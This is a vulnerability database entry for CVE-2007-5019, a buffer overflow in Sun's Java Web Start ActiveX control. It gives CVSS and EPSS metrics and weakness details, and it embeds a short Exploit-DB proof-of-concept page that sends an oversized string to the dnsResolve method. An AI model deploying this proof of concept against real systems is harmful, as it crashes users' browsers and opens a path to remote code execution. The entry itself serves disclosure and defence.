CVE-2007-5019 : Detail

CVE-2007-5019

Overflow
77.08%V3
Network
2007-09-20
19h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the Sun Java Web Start ActiveX control in Java Runtime Environment (JRE) 1.6.0_X allows remote attackers to have an unknown impact via a long argument to the dnsResolve (isInstalled.dnsResolve) method.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4432

Publication date : 2007-09-18 22h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

<html> <body> <center> Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC<br> Bug founded and code released by Yag Kohha. <br> Greetz to: <br> Shinnai, Str0ke <br> </center> <object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284" id="target"></OBJECT> <SCRIPT language="javascript"> var b = 'XXXX'; while (b.length <= 512*512) b+=b; target.dnsResolve(b); </script> </body> </html> # milw0rm.com [2007-09-19]

Products Mentioned

Configuraton 0

Sun>>Java_web_start >> Version *

Sun>>Jre >> Version 1.6.0_0

    Sun>>Jre >> Version 1.6.0_10

      Sun>>Sdk >> Version 1.3.0

        References

        https://www.exploit-db.com/exploits/4432
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://www.securityfocus.com/bid/25734
        Tags : vdb-entry, x_refsource_BID
        http://osvdb.org/38297
        Tags : vdb-entry, x_refsource_OSVDB